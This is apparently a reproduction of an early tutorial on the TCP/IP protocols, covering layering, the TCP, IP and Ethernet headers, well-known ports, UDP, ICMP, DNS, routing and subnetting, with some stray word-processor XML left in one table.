attached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on "file servers". (See RFC's 1001 and 1002 for a description o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C-oriented NetBIOS over TCP. In the workstation and minicompu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rea, Sun's Network File System is more likely to be used. Protoc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pecifications for it are available from Sun Microsyste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5] Remote Prin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is allows you to access printers on other computers as i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y were directly attached to yours. (The most commonly used protoc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s the remote lineprinter protocol from Berkeley Unix. Unfortunate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is no protocol document for this. However the C code is easi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btained from Berkeley, so implementations are comm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6] Remote Execu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is allows you to request that a particular program be run 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different computer. This is useful when you can do most of your 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 a small computer, but a few tasks require the resources of a larg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 There are a number of different kinds of remote execu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me operate on a command by command basis. That is, you request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pecific command or set of commands should run on some specif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puter. (More sophisticated versions will choose a system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appens to be free.) However there are also "remote procedure c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s that allow a program to call a subroutine that will run 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other computer. (There are many protocols of this sort. Berkel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ix contains two servers to execute commands remotely: rsh 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xec. The man pages describe the protocols that they use.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contributed software with Berkeley 4.3 contains a "distribu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ell" that will distribute tasks among a set of systems, depend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pon load. Remote procedure call mechanisms have been a topic f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search for a number of years, so many organizations ha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mplementations of such facilities. The most widespre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ercially-supported remote procedure call protocols seem to b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Xerox's Courier and Sun's RPC. Protocol documents are available fr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Xerox and Sun. There is a public implementation of Courier over TCP a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rt of the user-contributed software with Berkeley 4.3. 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mplementation of RPC was posted to Usenet by Sun, and also appears a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rt of the user-contributed software with Berkeley 4.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7] Name Serv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n large installations, there are a number of differ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llections of names that have to be managed. This includes users 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ir passwords, names and network addresses for computers, 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ccounts. It becomes very tedious to keep this data up to date on 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f the computers. Thus the databases are kept on a small number o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s. Other systems access the data over the network. (RFC 822 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23 describe the name server protocol used to keep track of host na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d Internet addresses on the Internet. This is now a required part o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y TCP/IP implementation. IEN 116 describes an older name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tocol that is used by a few terminal servers and other products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ok up host names. Sun's Yellow Pages system is designed as a gener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chanism to handle user names, file sharing groups, and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tabases commonly used by Unix systems. It is widely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ercially. Its protocol definition is available from Su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8] Terminal Serv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Many installations no longer connect terminals directly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puters. Instead they connect them to terminal servers. A termin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er is simply a small computer that only knows how to run tel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r some other protocol to do remote login). If your terminal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nnected to one of these, you simply type the name of a computer, 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are connected to it. Generally it is possible to have acti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nnections to more than one computer at the same time. The termin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er will have provisions to switch between connections rapidly, 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notify you when output is waiting for another connection. (Termin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ers use the telnet protocol, already mentioned. However any re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rminal server will also have to support name service and a number o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ther protoco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9] Network-Oriented Window Syste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Until recently, high- performance graphics programs had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ecute on a computer that had a bit-mapped graphics screen direct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ttached to it. Network window systems allow a program to use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isplay on a different computer. Full-scale network window syste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vide an interface that lets you distribute jobs to the systems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re best suited to handle them, but still give you a sing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raphically-based user interface. (The most widely-implemented wind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 is X. A protocol description is available from MIT's Proje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thena. A reference implementation is publicly available from MIT.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umber of vendors are also supporting NeWS, a window system defined b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un. Both of these systems are designed to use TCP/I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at some of the protocols described above were designed by Berkeley, Sun, or other organizations. Thus they are not officially part of the Internet protocol suite. However they are implemen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ing TCP/IP, just as normal TCP/IP application protocols are. Since the protocol definitions are not considered proprietary, and since commercially-support implementations are widely available, it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asonable to think of these protocols as being effectively part of the Internet sui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so note that the list above is simply a sample of the sort of services available through TCP/IP. However it does contain the majority of the "major" applications. The other commonly-used protocols tend to b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pecialized facilities for getting information of various kinds, such as who is logged in, the time of day, etc. However if you need a facility that is not listed here, we encourage you to look through the current edition of Internet Protocols (currently RFC 1011), which lists all of the available protocols, and also to look at some of the major TCP/IP implementations to see what various vendors have add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0] General description of the TCP/IP protoco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CP/IP is a layered set of protocols. In order to understand what this means, it is useful to look at an example. A typical situation is sending mail. First, there is a protocol for mail. This defines a set of commands which one machine sends to another, e.g. commands to specify who the sender of the message is, who it is being sent to, and then the text of the message. However this protocol assumes that there is a way to communicate reliably between the two computers. Mail, like other application protocols, simply defines a set of commands and messages to be sent. It is designed to be used together with TCP and I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CP is responsible for making sure that the commands get through to the other end. It keeps track of what is sent, and retransmits anything that did not get through. If any message is too large for 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tagram, e.g. the text of the mail, TCP will split it up into several datagrams, and make sure that they all arrive correctly. Since these functions are needed for many applications, they are put together in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eparate protocol, rather than being part of the specifications for sending mail. You can think of TCP as forming a library of routines that applications can use when they need reliable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unications with another compu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milarly, TCP calls on the services of IP. Although the services that TCP supplies are needed by many applications, there are still some kinds of applications that don't need them. However there are so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ices that every application needs. So these services are put together into IP. As with TCP, you can think of IP as a library of routines that TCP calls on, but which is also available to applications that don't use TCP. This strategy of building several levels of protocol is called "layering". We think of the applications programs such as mail, TCP, and IP, as being separate "layers", each of which calls on the services of the layer below it. Generally, TCP/IP applications use 4 layers: an application protocol such as mail, a protocol such as TCP that provides services need by many applications IP, which provides the basic service of getting datagrams to their destination the  protocols needed to manage a specific physical medium, such as Ethernet or a point to point l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CP/IP is based on the "catenet model". (This is described in more detail in IEN 48.) This model assumes that there are a large number of independent networks connected together by gateways. The user should be able to access computers or other resources on any of these networks. Datagrams will often pass through a dozen different networks before getting to their final destin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outing needed to accomplish this should be completely invisible to the user. As far as the user is concerned, all he needs to know in order to access another system is an "Internet address". This is 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ress that looks like 128.6.4.194. It is actually a 32-bit number. However it is normally written as 4 decimal numbers, each representing 8 bits of the address. (The term "octet" is used by Internet documentation for such 8-bit chunks. The term "byte" is not used, because TCP/IP is supported by some computers that have byte sizes other than 8 bits.) Generally the structure of the address giv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some information about how to get to the system. For example, 128.6 is a network number assigned by a central authority to Rutgers University. Rutgers uses the next octet to indicate which of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ampus Ethernets is involved. 128.6.4 happens to be an Ethernet used by the Computer Science Department. The last octet allows for up to 254 systems on each Ethernet. (It is 254 because 0 and 255 are not allowed, for reasons that will be discussed later.) Note that 128.6.4.194 and 128.6.5.194 would be different systems. The structure of an Internet address is described in a bit more detail la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f course we normally refer to systems by name, rather than by Internet address. When we specify a name, the network software looks it up in a database, and comes up with the corresponding Inter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ddr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st of the network software deals strictly in terms of the address. (RFC 882 describes the name server technology used to handle this lookup.)  TCP/IP is built on "connectionless" technology. Information is transferred as a sequence of "datagrams". A datagram is a collection of data that is sent as a sing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ssage. Each of these datagrams is sent through the network individually. There are provisions to open connections (i.e. to start a conversation that will continue for some time). However at some level, information from those connections is broken up into datagrams, and those datagrams are treated by the network as completely separ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example, suppose you want to transfer a 15000 octet file. Most networks can't handle a 15000 octet datagram. So the protocols will break this up into something like 30 500-octet datagrams. Each of these datagrams will be sent to the other end. At that point, they will be put back together into the 15000-oct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le. However while those datagrams are in transit, the network doesn't know that there is any connection between them. It is perfectly possible that datagram 14 will actually arrive before datagram 13. It is also possible that somewhere in the network, an error will occur, and some datagram won't get through at all. In that case, that datagram has to be sent ag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by the way that the terms "datagram" and "packet" often seem to be nearly interchangable. Technically, datagram is the right word to use when describing TCP/IP. A datagram is a unit of data, which is what the protocols deal with. A packet is a physical thing, appearing on an Ethernet or some wire. In most cases a packet simply contains a datagram, so there is very little difference. However they can differ. When TCP/IP is used on top of X.25, the X.25 interface breaks the datagrams up into 128-byte packets. This is invisible to IP, because the packets are put back together into a single datagram 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other end before being processed by TCP/IP. So in this case, one IP datagram would be carried by several packets. However with most media, there are efficiency advantages to sending one datagram p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cket, and so the distinction tends to vani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1] The TCP Leve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wo separate protocols are involved in handling TCP/IP datagrams. TCP (the "transmission control protocol") is responsible for breaking up the message into datagrams, reassembling them at the other end, resending anything that gets lost, and putting things back in the right order. IP (the "internet protocol") is responsible for routing individual datagrams. It may seem like TCP is doing all the work. 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small networks that is true. However in the Internet, simply getting a datagram to its destination can be a complex job. A connection may require the datagram to go through several networks at Rutgers, a serial line to the John von Neuman Supercomputer Center, a couple of Ethernets there, a series of 56Kbaud phone lines to another NSFnet site, and more Ethernets on another campus. Keeping track o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outes to all of the destinations and handling incompatibilities among different transport media turns out to be a complex jo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at the interface between TCP and IP is fairly simple. TCP simply hands IP a datagram with a destination. IP doesn't know how this datagram relates to any datagram before it or after it.  It m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ave occurred to you that something is missing here. We have talked about Internet addresses, but not about how you keep track of multiple connections to a given system. Clearly it isn't enough to get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tagram to the right destination. TCP has to know which connection this datagram is part o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task is referred to as "demultiplexing." In fact, there are several levels of demultiplexing going on in TCP/IP. The information needed to do this demultiplexing is contained in a series of "headers". A header is simply a few extra octets tacked onto the beginning of a datagram by some protocol in order to keep track of it. It's a lot like putting a letter into an envelope and putting an address on the outside of the envelope. Except with modern networks it happens several times. It's like you put the letter into a litt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velope, your secretary puts that into a somewhat bigger envelope, the campus mail center puts that envelope into a still bigger one, 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ere is an overview of the headers that get stuck on a message that passes through a typical TCP/IP networ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 start with a single data stream, say a file you are trying to send to some other compu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CP breaks it up into manageable chunks. (In order to do this, TCP has to know how large a datagram your network can handle. Actually, the TCP's at each end say how big a datagram they can handle, and then they pick the smallest siz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CP puts a header at the front of each datagram. This header actually contains at least 20 octets, but the most important ones are a source and destination "port number" and a "sequence number". The po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umbers are used to keep track of different conversations. Suppose 3 different people are transferring files. Your TCP might allocate port numbers 1000, 1001, and 1002 to these transfers. When you are sending a datagram, this becomes the "source" port number, since you are the source of the datagram. Of course the TCP at the other end has assigned a port number of its own for the conversation. Your TCP has to know the port number used by the other end as well. (It finds out when the connection starts, as we will explain below.) It puts this in the "destination" port field. Of course if the other end sends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tagram back to you, the source and destination port numbers will be reversed, since then it will be the source and you will be the destin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ach datagram has a sequence number. This is used so that the other end can make sure that it gets the datagrams in the right order, and that it hasn't missed any. (See the TCP specification f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tails.) TCP doesn't number the datagrams, but the octets. So if there are 500 octets of data in each datagram, the first datagram might be numbered 0, the second 500, the next 1000, the next 15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inally, I will mention the Checksum. This is a number that is computed by adding up all the octets in the datagram (more or less - see the TCP spec). The result is put in the header. TCP at the other end computes the checksum again. If they disagree, then something bad happened to the datagram in transmission, and it is thrown awa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window is used to control how much data can be in transit at any one time. It is not practical to wait for each datagram to be acknowledged before sending the next one. That would slow things dow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o much. On the other hand, you can't just keep sending, or a fast computer might overrun the capacity of a slow one to absorb data. Thus each end indicates how much new data it is currently prepared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sorb by putting the number of octets in its "Window" field. As the computer receives data, the amount of space left in its window decreases. When it goes to zero, the sender has to stop. As the receiver processes the data, it increases its window, indicating that it is ready to accept more data. Often the same datagram can be used to acknowledge receipt of a set of data and to give permission f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itional new data (by an updated wind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Urgent" field allows one end to tell the other to skip ahead in its processing to a particular octet. This is often useful for handling asynchronous events, for example when you type a control character or other command that interrupts output. The other fields are beyond the scope of this docu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2] The IP leve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CP sends each of these datagrams to IP. Of course it has to tell IP the Internet address of the computer at the other end. Note that this is all IP is concerned about. It doesn't care about what is in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tagram, or even in the TCP header. IP's job is simply to find a route for the datagram and get it to the other end. In order to allow gateways or other intermediate systems to forward the datagram,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s its own head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main things in this header are the source and destination Internet address (32-bit addresses, like 128.6.4.194), the protocol number, and another checksum. The source Internet address is simply the address of your machine. (This is necessary so the other end knows where the datagram came from.) The destination Internet address is the address of the other machine. (This is necessary so any gateways in the middle know where you want the datagram to go.) The protocol number tells IP at the other end to send the datagram to TCP. Although most IP traffic uses TCP, there are other protocols that can use IP, so you have to tell IP which protocol to send the datagram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nally, the checksum allows IP at the other end to verify that the header wasn't damaged in transit. Note that TCP and IP have separate checksums. IP needs to be able to verify that the header didn't g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amaged in transit, or it could send a message to the wrong place. For reasons not worth discussing here, it is both more efficient and safer to have TCP compute a separate checksum for the TCP header and dat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gain, the header contains some additional fields that have not been discussed. Most of them are beyond the scope of this document. The flags and fragment offset are used to keep track of the pieces when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tagram has to be split up. This can happen when datagrams are forwarded through a network for which they are too big. (This will be discussed a bit more below.) The time to live is a number that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cremented whenever the datagram passes through a system. When it goes to zero, the datagram is discarded. This is done in case a loop develops in the system somehow. Of course this should be impossible, but well-designed networks are built to cope with "impossible" condi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t this point, it's possible that no more headers are needed. If your computer happens to have a direct phone line connecting it to the destination computer, or to a gateway, it may simply send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tagrams out on the line (though likely a synchronous protocol such as HDLC would be used, and it would add at least a few octets at the beginning and e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3] The Ethernet leve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st of our networks these days use Ethernet. So now we have to describe Ethernet's headers. Unfortunately, Ethernet has its own addresses. The people who designed Ethernet wanted to make sure that no two machines would end up with the same Ethernet address. Furthermore, they didn't want the user to have to worry about assigning addresses. So each Ethernet controller comes with an add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uiltin from the factory. In order to make sure that they would never have to reuse addresses, the Ethernet designers allocated 48 bits for the Ethernet address. People who make Ethernet equipment have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gister with a central authority, to make sure that the numbers they assign don't overlap any other manufactur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thernet is a "broadcast medium". That is, it is in effect like an old party line telephone. When you send a packet out on the Ethernet, every machine on the network sees the packet. So something is need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make sure that the right machine gets it. As you might guess, this involves the Ethernet header. Every Ethernet packet has a 14-octet header that includes the source and destination Ethernet address, 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type code. Each machine is supposed to pay attention only to packets with its own Ethernet address in the destination field. (It's perfectly possible to cheat, which is one reason that Ethernet communications are not terribly sec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at there is no connection between the Ethernet address and the Internet address. Each machine has to have a table of what Ethernet address corresponds to what Internet address. (We will describe h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table is constructed a bit later.)  In addition to the addresses, the header contains a type code. The type code is to allow for several different protocol families to be used on the same network. So you c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 TCP/IP, DECnet, Xerox NS, etc. at the same time. Each of them will put a different value in the type field. Finally, there is a checksum. The Ethernet controller computes a checksum of the enti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cket. When the other end receives the packet, it recomputes the checksum, and throws the packet away if the answer disagrees with the original. The checksum is put on the end of the packet, not in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ead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en these packets are received by the other end, of course all the headers are removed. The Ethernet interface removes the Ethernet header and the checksum. It looks at the type code. Since the typ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de is the one assigned to IP, the Ethernet device driver passes the datagram up to IP. IP removes the IP header. It looks at the IP protocol field. Since the protocol type is TCP, it passes the datagr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p to TCP. TCP now looks at the sequence number. It uses the sequence numbers and other information to combine all the datagrams into the original file.  The ends our initial summary of TCP/IP. There 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ill some crucial concepts we haven't gotten to, so we'll now go back and add details in several areas. (For detailed descriptions of the items discussed here see, RFC 793 for TCP, RFC 791 for IP, and RFC'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94 and 826 for sending IP over Ether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4] Well-Known Sockets And The Applications Lay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 far, we have described how a stream of data is broken up into datagrams, sent to another computer, and put back together. However something more is needed in order to accomplish anything useful. The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as to be a way for you to open a connection to a specified computer, log into it, tell it what file you want, and control the transmission of the file. (If you have a different application in mind, e.g. computer mail, some analogous protocol is needed.) This is done by "application protoco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pplication protocols run "on top" of TCP/IP. That is, when they want to send a message, they give the message to TCP. TCP makes sure it gets delivered to the other end. Because TCP and IP take care of all the networking details, the applications protocols can treat a network connection as if it were a simple byte stream, like a terminal or phone line.  Before going into more details about applic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grams, we have to describe how you find an applic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uppose you want to send a file to a computer whose Internet address is 128.6.4.7. To start the process, you need more than just the Internet address. You have to connect to the FTP server at the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d. In general, network programs are specialized for a specific set of tasks. Most systems have separate programs to handle file transfers, remote terminal logins, mail, etc. When you connect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8.6.4.7, you have to specify that you want to talk to the FTP server. This is done by having "well-known sockets" for each server. Recall that TCP uses port numbers to keep track of individual conversations. User programs normally use more or less random port numbers. However specific port numbers are assigned to the programs that sit waiting for reque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example, if you want to send a file, you will start a program called "ftp". It will open a connection using some random number, say 1234, for the port number on its end. However it will specify po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umber 21 for the other end. This is the official port number for the FTP server. Note that there are two different programs involved. You run ftp on your side. This is a program designed to accept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om your terminal and pass them on to the other end. The program that you talk to on the other machine is the FTP server. It is designed to accept commands from the network connection, rather than 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active terminal. There is no need for your program to use a well-known socket number for itself. Nobody is trying to find it. However the servers have to have well-known numbers, so that people can open connections to them and start sending them commands. The official port numbers for each program are given in "Assigned Numb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at a connection is actually described by a set of 4 numbers: the Internet address at each end, and the TCP port number at each end. Every datagram has all four of those numbers in it. (The Inter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resses are in the IP header, and the TCP port numbers are in the TCP header.) In order to keep things straight, no two connections can have the same set of numbers. However it is enough for any one numb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be different. For example, it is perfectly possible for two different users on a machine to be sending files to the same other machine. This could result in connections with the following paramet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Internet addresses</w:t>
        <w:tab/>
        <w:t xml:space="preserve">   TCP por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nnection 1</w:t>
        <w:tab/>
        <w:t>128.6.4.194, 128.6.4.7</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    1234, 2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nnection 2</w:t>
        <w:tab/>
        <w:t>128.6.4.194, 128.6.4.7</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    1235, 2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nce the same machines are involved, the Internet addresses are the same. Since they are both doing file transfers, one end of the connection involves the well-known port number for FTP. The only th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at differs is the port number for the program that the users are running. That's enough of a difference. Generally, at least one end of the connection asks the network software to assign it a port numb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at is guaranteed to be unique. Normally, it's the user's end, since the server has to use a well-known numb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 that we know how to open connections, let's get back to the applications programs. As mentioned earlier, once TCP has opened a connection, we have something that might as well be a simple wire. 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hard parts are handled by TCP and IP. However we still need some agreement as to what we send over this connection. In effect this is simply an agreement on what set of commands the application wi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derstand, and the format in which they are to be sent. Generally, what is sent is a combination of commands and data. They use context to differenti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example, the mail protocol works like this: Your mail program opens a connection to the mail server at the other end. Your program gives it your machine's name, the sender of the message, and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cipients you want it sent to. It then sends a command saying that it is starting the message. At that point, the other end stops treating what it sees as commands, and starts accepting the message. Your end then starts sending the text of the message. At the end of the message, a special mark is sent (a dot in the first column). After that, both ends understand that your program is again sending commands. This is the simplest way to do things, and the one that most applications u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le transfer is somewhat more complex. The file transfer protocol involves two different connections. It starts out just like mail. The user's program sends commands like "log me in as this user", "here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y password", "send me the file with this name". However once the command to send data is sent, a second connection is opened for the data itself. It would certainly be possible to send the data on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ame connection, as mail does. However file transfers often take a long time. The designers of the file transfer protocol wanted to allow the user to continue issuing commands while the transfer is go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 For example, the user might make an inquiry, or he might abort the transfer. Thus the designers felt it was best to use a separate connection for the data and leave the original command connection f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s. (It is also possible to open command connections to two different computers, and tell them to send a file from one to the other. In that case, the data couldn't go over the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nne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mote terminal connections use another mechanism still. For remote logins, there is just one connection. It normally sends data. When it is necessary to send a command (e.g. to set the terminal type or to change some mode), a special character is used to indicate that the next character is a command. If the user happens to type that special character as data, two of them are s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 are not going to describe the application protocols in detail in this document. It's better to read the RFC's yourself. However there are a couple of common conventions used by applications that will b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scribed here. First, the common network representation: TCP/IP is intended to be usable on any computer. Unfortunately, not all computers agree on how data is represented. There are differences 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aracter codes (ASCII vs. EBCDIC), in end of line conventions (carriage return, line feed, or a representation using counts), and in whether terminals expect characters to be sent individually or a l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t a time. In order to allow computers of different kinds to communicate, each applications protocol defines a standard represent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at TCP and IP do not care about the representation. TCP simply sends octets. However the programs at both ends have to agree on how the octets are to be interpreted. The RFC for each application specifies the standard representation for that application. Normally it is "net ASCII". This uses ASCII characters, with end of line denoted by a carriage return followed by a line feed. For remo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gin, there is also a definition of a "standard terminal", which turns out to be a half-duplex terminal with echoing happening on the local machine. Most applications also make provisions for the tw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puters to agree on other representations that they may find more convenient. For example, PDP-10's have 36-bit words. There is a way that two PDP-10's can agree to send a 36-bit binary file. Similar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wo systems that prefer full-duplex terminal conversations can agree on that. However each application has a standard representation, which every machine must suppo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ep in mind that it has become common practice for some corporations to change a services port number on the server side. If your client software is not configured with the same port number, connection will not be successful. We will discuss later in this text how you can perform port scanning on an entire IP address to see which ports are acti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5] Other IP Protoco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tocols other than TCP: UDP and ICM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 far, we have described only connections that use TCP. Recall that TCP is responsible for breaking up messages into datagrams, and reassembling them properly. However in many applications, we ha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ssages that will always fit in a single datagram. An example is name lookup. When a user attempts to make a connection to another system, he will generally specify the system by name, rather than Inter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ress. His system has to translate that name to an address before it can do anything. Generally, only a few systems have the database used to translate names to addresses. So the user's system will want to send a query to one of the systems that has the database. This query is going to be very short. It will certainly fit in one datagram. So will the answer. Thus it seems silly to use TCP. Of course TCP do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re than just break things up into datagrams. It also makes sure that the data arrives, resending datagrams where necessary. But for a question that fits in a single datagram, we don't need all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plexity of TCP to do this. If we don't get an answer after a few seconds, we can just ask again. For applications like this, there are alternatives to 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most common alternative is UDP ("user datagram protocol"). UDP is designed for applications where you don't need to put sequences of datagrams together. It fits into the system much like TCP. There is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DP header. The network software puts the UDP header on the front of your data, just as it would put a TCP header on the front of your data. Then UDP sends the data to IP, which adds the IP header, put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DP's protocol number in the protocol field instead of TCP's protocol number. However UDP doesn't do as much as TCP does. It doesn't split data into multiple datagrams. It doesn't keep track of what it ha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nt so it can resend if necessary. About all that UDP provides is port numbers, so that several programs can use UDP at once. UDP port numbers are used just like TCP port numbers. There are well-known po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umbers for servers that use UDP. Note that the UDP header is shorter than a TCP header. It still has source and destination port numbers, and a checksum, but that's about it. No sequence number, since it is not needed. UDP is used by the protocols that handle name lookups (see IEN 116, RFC 882, and RFC 883), and a number of similar protoco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other alternative protocol is ICMP ("Internet Control Message Protocol"). ICMP is used for error messages, and other messages intended for the TCP/IP software itself, rather than any particula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 program. For example, if you attempt to connect to a host, your system may get back an ICMP message saying "host unreachable". ICMP can also be used to find out some information about the network. See RFC 792 for details of ICMP. ICMP is similar to UDP, in that it handles messages that fit in one datagram. However it is even simpler than UDP. It doesn't even have port numbers in its header. Since all ICMP messages are interpreted by the network software itself, no port numbers are needed to say where a ICMP message is supposed to g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6] Domain Name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eping track of names and information: the domain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we indicated earlier, the network software generally needs a 32-bit Internet address in order to open a connection or send a datagram. However users prefer to deal with computer names rather th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umbers. Thus there is a database that allows the software to look up a name and find the corresponding number. When the Internet was small, this was easy. Each system would have a file that listed all of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ther systems, giving both their name and number. There are now too many computers for this approach to be practical. Thus these files have been replaced by a set of name servers that keep track of ho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s and the corresponding Internet addresses. (In fact these servers are somewhat more general than that. This is just one kind of information stored in the domain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at a set of interlocking servers are used, rather than a single central one. There are now so many different institutions connected to the Internet that it would be impractical for them to notify a centr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uthority whenever they installed or moved a computer. Thus naming authority is delegated to individual institutions. The name servers form a tree, corresponding to institutional structure. The na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mselves follow a similar struc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typical example is the name BORAX.LCS.MIT.EDU. This is a computer at the Laboratory for Computer Science (LCS) at MIT. In order to find its Internet address, you might potentially have to consult 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ifferent servers. First, you would ask a central server (called the root) where the EDU server is. EDU is a server that keeps track of educational institutions. The root server would give you the names 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net addresses of several servers for EDU. (There are several servers at each level, to allow for the possibly that one might be down.) You would then ask EDU where the server for MIT is. Again,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ould give you names and Internet addresses of several servers for MIT. Generally, not all of those servers would be at MIT, to allow for the possibility of a general power failure at MIT. Then you would as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IT where the server for LCS is, and finally you would ask one of the LCS servers about BORAX. The final result would be the Internet address for BORAX.LCS.MIT.EDU. Each of these levels is referred to a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domain". The entire name, BORAX.LCS.MIT.EDU, is called a "domain name". (So are the names of the higher-level domains, such as LCS.MIT.EDU, MIT.EDU, and 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tunately, you don't really have to go through all of this most of the time. First of all, the root name servers also happen to be the name servers for the top-level domains such as EDU. Thus a sing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query to a root server will get you to MIT. Second, software generally remembers answers that it got before. So once we look up a name at LCS.MIT.EDU, our software remembers where to find servers f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CS.MIT.EDU, MIT.EDU, and EDU. It also remembers the translation of BORAX.LCS.MIT.EDU. Each of these pieces of information has a "time to live" associated with it. Typically this is a few days. After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information expires and has to be looked up again. This allows institutions to change thing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domain system is not limited to finding out Internet addresses. Each domain name is a node in a database. The node can have records that define a number of different properties. Examples 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net address, computer type, and a list of services provided by a computer. A program can ask for a specific piece of information, or all information about a given name. It is possible for a node in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tabase to be marked as an "alias" (or nickname) for another node. It is also possible to use the domain system to store information about users, mailing lists, or other objec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is an Internet standard defining the operation of these databases, as well as the protocols used to make queries of them. Every network utility has to be able to make such queries, since this is now the official way to evaluate host names. Generally utilities will talk to a server on their own system. This server will take care of contacting the other servers for them. This keeps down the amount of code that has to be in each application progr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domain system is particularly important for handling computer mail. There are entry types to define what computer handles mail for a given name, to specify where an individual is to receive mail, and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ine mailing lists.  (See RFC's 882, 883, and 973 for specifications of the domain system. RFC 974 defines the use of the domain system in sending ma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7] Rou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description above indicated that the IP implementation is responsible for getting datagrams to the destination indicated by the destination address, but little was said about how this would b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ne. The task of finding how to get a datagram to its destination is referred to as "routing". In fact many of the details depend upon the particular implementation. However some general things can be sai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rst, it is necessary to understand the model on which IP is based. IP assumes that a system is attached to some local network. We assume that the system can send datagrams to any other system on its own network. (In the case of Ethernet, it simply finds the Ethernet address of the destination system, and puts the datagram out on the Ethernet.) The problem comes when a system is asked to send a datagram to a system on a different network. This problem is handled by gateways. A gateway is a system that connects a network with one or more other networks. Gateways are often normal computers that happen to have more than one network interface. For example, we have a Unix machine that has two different Ethernet interfaces. Thus it is connected to networks 128.6.4 and 128.6.3. This machine can act as a gateway between those two networks. The software on that machine must be set up so that it will forward datagrams from one network to the other. That is, if a machine on network 128.6.4 sends a datagram to the gateway, and the datagram is addressed to a machine on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8.6.3, the gateway will forward the datagram to the destination. Major communications centers often have gateways that connect a number of different networks. (In many cases, special-purpose gateway systems provide better performance or reliability than general-purpose systems acting as gateways. A number of vendors sell such syste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ing in IP is based entirely upon the network number of the destination address. Each computer has a table of network numbers. For each network number, a gateway is listed. This is the gateway to b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d to get to that network. Note that the gateway doesn't have to connect directly to the network. It just has to be the best place to go to get there. For example at Rutgers, our interface to NSFnet is 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John von Neuman Supercomputer Center (JvNC). Our connection to JvNC is via a high-speed serial line connected to a gateway whose address is 128.6.3.12. Systems on net 128.6.3 will list 128.6.3.12 a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gateway for many off-campus networks. However systems on net 128.6.4 will list 128.6.4.1 as the gateway to those same off-campus networks. 128.6.4.1 is the gateway between networks 128.6.4 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8.6.3, so it is the first step in getting to JvN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en a computer wants to send a datagram, it first checks to see if the destination address is on the system's own local network. If so, the datagram can be sent directly. Otherwise, the system expects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nd an entry for the network that the destination address is on. The datagram is sent to the gateway listed in that entry. This table can get quite big. For example, the Internet now includes several hund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dividual networks. Thus various strategies have been developed to reduce the size of the routing table. One strategy is to depend upon "default routes". Often, there is only one gateway out of a network. This gateway might connect a local Ethernet to a campus-wide backbone network. In that case, we don't need to have a separate entry for every network in the world. We simply define that gateway as a "default". When no specific route is found for a datagram, the datagram is sent to the default gateway. A default gateway can even be used when there are several gateways on a network. There are provisions for gateways to send a message saying "I'm not the best gateway -- use this one instead." (The message is sent via ICMP. See RFC 792.) Most network software is designed to use these messages to add entries to their routing tables. Suppose network 128.6.4 has two gateways, 128.6.4.59 and 128.6.4.1. 128.6.4.59 leads to several other internal Rutgers networks. 128.6.4.1 leads indirectly to the NSFnet. Suppose we set 128.6.4.59 as a default gateway, and have no other routing table entries. Now what happens when we need to send a datagram to MIT? MIT is network 18. Since we have no entry for network 18, the datagram will be sent to the default, 128.6.4.59. As it happens, this gateway is the wrong one. So it will forward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tagram to 128.6.4.1. But it will also send back an error saying in effect: "to get to network 18, use 128.6.4.1". Our software will then add an entry to the routing table. Any future datagrams to MIT will then go directly to 128.6.4.1. (The error message is sent using the ICMP protocol. The message type is called "ICMP redire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st IP experts recommend that individual computers should not try to keep track of the entire network. Instead, they should start with default gateways, and let the gateways tell them the routes, as ju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scribed. However this doesn't say how the gateways should find out about the routes. The gateways can't depend upon this strategy. They have to have fairly complete routing tables. For this, some sort o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ing protocol is needed. A routing protocol is simply a technique for the gateways to find each other, and keep up to date about the  best way to get to every network. RFC 1009 contains a review o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ateway design and routing. However rip.doc is probably a better introduction to the subject. It contains some tutorial material, and a detailed description of the most commonly-used routing protoc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8] Subnets and Broadcas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tails about Internet Addresses: Subnets and Broadcas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indicated earlier, Internet addresses are 32-bit numbers, normally written as 4 octets (in decimal), e.g. 128.6.4.7. There are actually 3 different types of address. The problem is that the address has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dicate both the network and the host within the network. It was felt that eventually there would be lots of networks. Many of them would be small, but probably 24 bits would be needed to represent all the I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works. It was also felt that some very big networks might need 24 bits to represent all of their hosts. This would seem to lead to 48 bit addresses. But the designers really wanted to use 32 b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resses. So they adopted a klud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ssumption is that most of the networks will be small. So they set up three different ranges of address. Addresses beginning with 1 to 126 use only the first octet for the network number. The other three octets are available for the host number. Thus 24 bits are available for hosts. These numbers are used for large networks. But there can only be 126 of these very big networks. The Arpanet is one, and there are a few large commercial networks. But few normal organizations get one of these "class A" addresses. For normal large organizations, "class B" addresses are used. Class B addresses use the first two octets for the network number. Thus network numbers are 128.1 through 191.254. (We avoid 0 and 255, for reasons that we see below. We also avoid addresses beginning with 127, because that is used by some systems for special purposes.) The last two octets are available for host addesses, giving 16 bits of host address. This allows for 64516 computers, which should be enough for most organizations. (It is possible to get more than one class B address, if you run out.) Finally, class C addresses use three octets, in the range 192.1.1 to 223.254.254. These allow only 254 hosts on each network, but there c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 lots of these networks. Addresses above 223 are reserved for future use, as class D and E (which are currently not def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ny large organizations find it convenient to divide their network number into "subnets". For example, Rutgers has been assigned a class B address, 128.6. We find it convenient to use the third octet of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ress to indicate which Ethernet a host is on. This division has no significance outside of Rutgers. A computer at another institution would treat all datagrams addressed to 128.6 the same way. They woul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 look at the third octet of the address. Thus computers outside Rutgers would not have different routes for 128.6.4 or 128.6.5. But inside Rutgers, we treat 128.6.4 and 128.6.5 as separate networks. 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ffect, gateways inside Rutgers have separate entries for each Rutgers subnet, whereas gateways outside Rutgers just have one entry for 128.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at we could do exactly the same thing by using a separate class C address for each Ethernet. As far as Rutgers is concerned, it would be just as convenient for us to have a number of class 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resses. However using class C addresses would make things inconvenient for the rest of the world. Every institution that wanted to talk to us would have to have a separate entry for each one of ou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works. If every institution did this, there would be far too many networks for any reasonable gateway to keep track of. By subdividing a class B network, we hide our internal structure from everyone el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d save them trouble. This subnet strategy requires special provisions in the network software. It is described in RFC 95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 and 255 have special meanings. 0 is reserved for machines that don't know their address. In certain circumstances it is possible for a machine not to know the number of the network it is on, or even i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wn host address. For example, 0.0.0.23 would be a machine that knew it was host number 23, but didn't know on what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55 is used for "broadcast". A broadcast is a message that you want every system on the network to see. Broadcasts are used in some situations where you don't know who to talk to. For example, suppo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need to look up a host name and get its Internet address. Sometimes you don't know the address of the nearest name server. In that case, you might send the request as a broadcast. There are also cases where a number of systems are interested in information. It is then less expensive to send a single broadcast than to send datagrams individually to each host that is interested in the information. In order to send a broadcast, you use an address that is made by using your network address, with all ones in the part of the address where the host number goes. For example, if you are on network 128.6.4, you would use 128.6.4.255 for broadcasts. How this is actually implemented depends upon the medium. It is not possible to send broadcasts on the Arpanet, or on point to point lines. However it is possible on an 